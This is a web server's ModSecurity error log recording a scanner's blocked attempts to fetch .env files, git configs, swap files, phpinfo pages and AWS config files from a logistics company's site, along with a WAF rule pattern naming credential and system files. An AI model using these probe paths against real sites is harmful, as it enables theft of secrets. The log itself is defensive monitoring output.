[Tue May 26 14:48:47.362317 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/.git/config~"] [unique_id "ahVld7EQDDtxJNiDrdTcmAAAoGk"]
[Tue May 26 14:48:47.805395 2026] [security2:error] [pid 648203:tid 648318] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVld7EQDDtxJNiDrdTc2gAAu3I"]
[Tue May 26 14:48:47.807988 2026] [security2:error] [pid 648203:tid 648330] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/ADMIN/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc3QAAu34"]
[Tue May 26 14:48:47.810651 2026] [security2:error] [pid 648203:tid 648237] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/API/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc3wAAuyE"]
[Tue May 26 14:48:47.852756 2026] [autoindex:error] [pid 648203:tid 648231] [remote 195.178.110.199:55984] AH01276: Cannot serve directory /home2/onesomzc/public_html/www.landsonlogistics.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:48:47.950557 2026] [security2:error] [pid 648203:tid 648233] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/APP/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc6QAA_R0"]
[Tue May 26 14:48:47.956192 2026] [security2:error] [pid 648203:tid 648224] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BACKEND/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc7AAA_RQ"]
[Tue May 26 14:48:47.956364 2026] [security2:error] [pid 648203:tid 648247] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BE/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc7QAA_Ss"]
[Tue May 26 14:48:47.956710 2026] [security2:error] [pid 648203:tid 648240] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BACK/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc6wAA_SQ"]
[Tue May 26 14:48:47.956724 2026] [security2:error] [pid 648203:tid 648227] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Api/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc6gAA_Rc"]
[Tue May 26 14:48:47.957518 2026] [security2:error] [pid 648203:tid 648217] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Backend/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc7wAA_Q0"]
[Tue May 26 14:48:47.958191 2026] [security2:error] [pid 648203:tid 648221] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Be/.env"] [unique_id "ahVld7EQDDtxJNiDrdTc8AAA_RE"]
[Tue May 26 14:48:48.151957 2026] [security2:error] [pid 648203:tid 648451] [client 45.3.42.227:40987] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVld7EQDDtxJNiDrdTcagAAAPs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:48.252311 2026] [security2:error] [pid 648203:tid 648256] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdFQAA8jQ"]
[Tue May 26 14:48:48.260469 2026] [security2:error] [pid 648203:tid 648285] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/admin-app/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdHQAA6lE"]
[Tue May 26 14:48:48.404186 2026] [security2:error] [pid 648203:tid 648277] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdKAAAyUk"]
[Tue May 26 14:48:48.405440 2026] [security2:error] [pid 648203:tid 648306] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api-backend/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdLgAAyWY"]
[Tue May 26 14:48:48.405601 2026] [security2:error] [pid 648203:tid 648314] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdLQAAyW4"]
[Tue May 26 14:48:48.545827 2026] [security2:error] [pid 648203:tid 648207] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api-node/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdNAAAyQM"]
[Tue May 26 14:48:48.546809 2026] [security2:error] [pid 648203:tid 648304] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdNgAAyWQ"]
[Tue May 26 14:48:48.552636 2026] [security2:error] [pid 648203:tid 648208] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/api/info.php"] [unique_id "ahVleLEQDDtxJNiDrdTdQQAAyQQ"]
[Tue May 26 14:48:48.694933 2026] [security2:error] [pid 648203:tid 648299] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/api/phpinfo.php"] [unique_id "ahVleLEQDDtxJNiDrdTdSwAAyV8"]
[Tue May 26 14:48:48.703287 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/administrator/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdKwAAyWk"]
[Tue May 26 14:48:48.814054 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.5:27814] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/app/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdVgAAAOM"]
[Tue May 26 14:48:48.837335 2026] [security2:error] [pid 648203:tid 648327] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/apis/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdVwAA6Hs"]
[Tue May 26 14:48:48.842789 2026] [security2:error] [pid 648203:tid 648320] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/app/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdXQAAzXQ"]
[Tue May 26 14:48:48.993910 2026] [security2:error] [pid 648203:tid 648239] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/application/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdcgAAjyM"]
[Tue May 26 14:48:48.995395 2026] [security2:error] [pid 648203:tid 648220] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/apps/.env"] [unique_id "ahVleLEQDDtxJNiDrdTdcwAAjxA"]
[Tue May 26 14:48:49.534580 2026] [security2:error] [pid 648203:tid 648260] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back-api/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdnQAAmDg"]
[Tue May 26 14:48:49.537218 2026] [security2:error] [pid 648203:tid 648268] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back-end/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdnwAAmEA"]
[Tue May 26 14:48:49.684507 2026] [security2:error] [pid 648203:tid 648261] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backup/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdrgAAwTk"]
[Tue May 26 14:48:49.684546 2026] [security2:error] [pid 648203:tid 648281] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/beta/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdsAAAwU0"]
[Tue May 26 14:48:49.685706 2026] [security2:error] [pid 648203:tid 648269] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/be/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdrwAAwUE"]
[Tue May 26 14:48:49.700238 2026] [security2:error] [pid 648203:tid 648249] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdswAA1y0"]
[Tue May 26 14:48:49.700439 2026] [security2:error] [pid 648203:tid 648285] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdtAAA11E"]
[Tue May 26 14:48:49.701387 2026] [security2:error] [pid 648203:tid 648287] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend-api/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdsgAA11M"]
[Tue May 26 14:48:49.866298 2026] [security2:error] [pid 648203:tid 648314] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/cms/.env"] [unique_id "ahVlebEQDDtxJNiDrdTdzgAA924"]
[Tue May 26 14:48:49.872113 2026] [security2:error] [pid 648203:tid 648207] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/client/.env"] [unique_id "ahVlebEQDDtxJNiDrdTd0QAA9wM"]
[Tue May 26 14:48:49.980577 2026] [security2:error] [pid 648203:tid 648311] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config.php"] [unique_id "ahVlebEQDDtxJNiDrdTd1AAAo2s"]
[Tue May 26 14:48:49.996122 2026] [security2:error] [pid 648203:tid 648403] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlebEQDDtxJNiDrdTdpQAAAMs"]
[Tue May 26 14:48:49.998782 2026] [security2:error] [pid 648203:tid 648208] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/config/.env"] [unique_id "ahVlebEQDDtxJNiDrdTd2gAAogQ"]
[Tue May 26 14:48:50.020970 2026] [security2:error] [pid 648203:tid 648313] [remote 195.178.110.199:55984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config/aws.php"] [unique_id "ahVlerEQDDtxJNiDrdTd4AAAn20"]
